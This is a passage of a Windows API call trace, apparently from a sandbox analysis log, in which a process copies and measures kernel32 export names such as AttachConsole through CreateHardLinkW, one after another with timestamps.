lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.729] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.729] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.730] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.730] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.730] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.730] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.730] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.730] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.730] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.730] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.730] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.730] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.730] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.730] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.730] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.730] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.730] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.730] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.730] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.730] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.731] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.731] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.731] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.731] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.731] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.731] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.731] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.731] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.731] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.731] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.731] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.731] lstrlenA (lpString="BEEP") returned 4 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.731] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.731] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.731] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.731] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.731] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.731] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.732] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.732] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.732] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.732] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.732] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.732] lstrlenA (lpString="CANCELIO") returned 8 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.732] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.732] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.732] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.732] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.732] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.732] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.732] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.732] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.732] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.732] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.732] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.732] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.733] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.733] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.733] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.733] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.733] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.733] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.733] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.733] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.733] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.733] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.733] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.733] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.733] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.733] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.733] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.733] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.733] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.733] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.733] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.734] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.734] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.734] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.734] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.734] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.734] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.734] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.734] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.734] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.734] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.734] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.734] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.734] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.734] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.734] lstrlenA (lpString="COPYFILEA") returned 9 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.734] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.734] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.734] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.735] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.735] lstrlenA (lpString="COPYFILEW") returned 9 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.735] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.735] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.735] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.735] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.735] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.735] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.735] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.735] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.735] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.735] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.735] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.735] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.735] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.735] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.735] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.736] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.736] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.736] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.736] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.736] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.736] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.736] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.736] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.736] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.736] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.736] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.736] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.736] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.736] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.736] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.736] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.736] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.736] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.736] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.736] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.736] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.736] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.736] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.736] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.736] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.736] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.736] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.736] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.736] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.737] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.737] 